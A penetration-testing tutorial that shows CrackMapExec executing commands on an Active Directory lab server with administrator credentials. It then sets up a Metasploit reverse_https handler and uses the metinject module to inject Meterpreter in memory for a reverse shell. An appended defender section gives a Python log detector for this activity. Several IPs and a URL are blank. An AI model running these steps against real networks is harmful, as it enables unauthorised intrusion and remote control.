Penetration Testing in Windows/Active Directory with Crackmapexec

Datetime: 2016-08-23 01:08:25          Topic: Penetration Testing

Crackmapexec is a Swiss Army knife for pentesting Windows/Active Directory environments. Active Directory (AD) is a directory service that Microsoft developed for Windows domain networks. It is included in most Windows Server operating systems as a set of processes and services.

First of all, to install crackmapexec run the following commands:

apt-get install -y libssl-dev libffi-dev python-dev build-essential

I have already installed all the requirements, which is why they are shown as already installed, but you will have to install them.

Now we will create a virtual environment for crackmapexec with virtualenvwrapper.

virtualenvwrapper is a set of extensions to the virtualenv tool. The extensions include wrappers for creating and deleting virtual environments and otherwise managing your development workflow, making it easier to work on more than one project at a time without introducing conflicts in their dependencies.

apt-get install virtualenvwrapper

source /usr/share/virtualenvwrapper/

mkvirtualenv CME

pip install git+

pip install crackmapexec

Now, to execute a Windows command remotely, run the following command:

crackmapexec -u administrator -p 'Igni*******' -x whoami

As you can see, the server is Pwned and the output of the command is rajlab\administrator.

Here is the IP of the server running the Active Directory service in the network. We can also execute a PowerShell command:

crackmapexec -u administrator -p 'Igni*******' -X '$PSVersionTable'

The command is executed successfully and the output shows the PowerShell version.

If we don't know which host is the Active Directory server, we can run crackmapexec against the whole network by giving the network range, as in my case .

Now it is time to get a Meterpreter shell, so start Metasploit with the command msfconsole in a new terminal and set up the reverse handler:

use exploit/multi/handler

set payload windows/meterpreter/reverse_https

set lhost

set lport 444


Now on the previous terminal run command:

crackmapexec -u administrator -p Ign******* -M metinject -o LHOST= LPORT=444

As you can see, the payload executes successfully: the metinject module runs the PowerShell script Invoke-Shellcode.ps1 to inject Meterpreter directly into memory and return a reverse Meterpreter shell.

Here -M selects the module to use.

As you can see we got the meterpreter shell.
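What this activity looks like from the defender's side, as an added example that is not part of the original post and not CrackMapExec's own code: a small Python detector that correlates a network logon by an admin account (Windows Security event 4624, LogonType 3) with a process-creation event (4688) on the same host whose parent is a remote-execution launcher, raising the severity when the command line carries an encoded or in-memory PowerShell loader such as the Invoke-Shellcode stage used by metinject. The pipe-separated log format, the launcher list and the sample lines are constructed assumptions for the demo.

```python
"""Defender-side detector for CrackMapExec-style remote execution.
Assumption: the activity appears in Windows Security logs as a network logon
(4624, LogonType 3) by a privileged account, followed within seconds on the
same host by a process-creation event (4688) whose parent is a remote-execution
launcher (WmiPrvSE.exe for WMI, services.exe for service-based execution).
The pipe-separated lines below are a constructed format, not real EVTX output."""
from datetime import datetime, timedelta

REMOTE_EXEC_PARENTS = {"wmiprvse.exe", "services.exe"}       # assumed launchers
IN_MEMORY_MARKERS = ("-enc", "invoke-shellcode")              # encoded / in-memory PS

def parse(line):
    """'<iso-ts>|<event-id>|<host>|key=value|...' -> dict (constructed format)."""
    ts, eid, host, *pairs = line.split("|")
    rec = {"ts": datetime.fromisoformat(ts), "id": int(eid), "host": host}
    rec.update(p.split("=", 1) for p in pairs)
    return rec

def detect_remote_exec(lines, window=timedelta(seconds=60)):
    """Return (host, account, source_ip, parent, severity) for every process
    creation under a remote-exec launcher that follows a network logon."""
    events = sorted((parse(l) for l in lines), key=lambda r: r["ts"])
    logons = [e for e in events if e["id"] == 4624 and e.get("LogonType") == "3"]
    alerts = []
    for ev in events:
        if ev["id"] != 4688:
            continue
        parent = ev.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
        if parent not in REMOTE_EXEC_PARENTS:
            continue
        cmd = ev.get("CommandLine", "").lower()
        for lo in logons:  # earliest logon on this host within the window
            if lo["host"] == ev["host"] and timedelta(0) <= ev["ts"] - lo["ts"] <= window:
                sev = "high" if any(m in cmd for m in IN_MEMORY_MARKERS) else "medium"
                alerts.append((ev["host"], lo["User"], lo["SourceIp"], parent, sev))
                break
    return alerts

# Constructed sample: a whoami via WMI, an encoded PowerShell loader, then benign noise.
SAMPLE_LOGS = [
    "2016-08-23T01:00:00|4624|DC01|User=administrator|LogonType=3|SourceIp=192.0.2.50",
    "2016-08-23T01:00:02|4688|DC01|ParentImage=C:\\Windows\\System32\\wbem\\WmiPrvSE.exe"
    "|CommandLine=cmd.exe /Q /c whoami",
    "2016-08-23T01:05:00|4624|DC01|User=administrator|LogonType=3|SourceIp=192.0.2.50",
    "2016-08-23T01:05:03|4688|DC01|ParentImage=C:\\Windows\\System32\\wbem\\WmiPrvSE.exe"
    "|CommandLine=powershell.exe -NoP -W Hidden -Enc QUFBQQ==",
    "2016-08-23T02:00:00|4688|DC01|ParentImage=C:\\Windows\\explorer.exe|CommandLine=notepad.exe",
]

if __name__ == "__main__":
    for alert in detect_remote_exec(SAMPLE_LOGS):
        print(alert)
```

Enabling command-line auditing for event 4688 (or Sysmon process creation) is what makes the second, encoded-loader alert possible; without it only the logon/launcher pairing remains.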

Author: Himanshu Gupta is an InfoSec Researcher and Technical Writer. You can follow him on LinkedIn.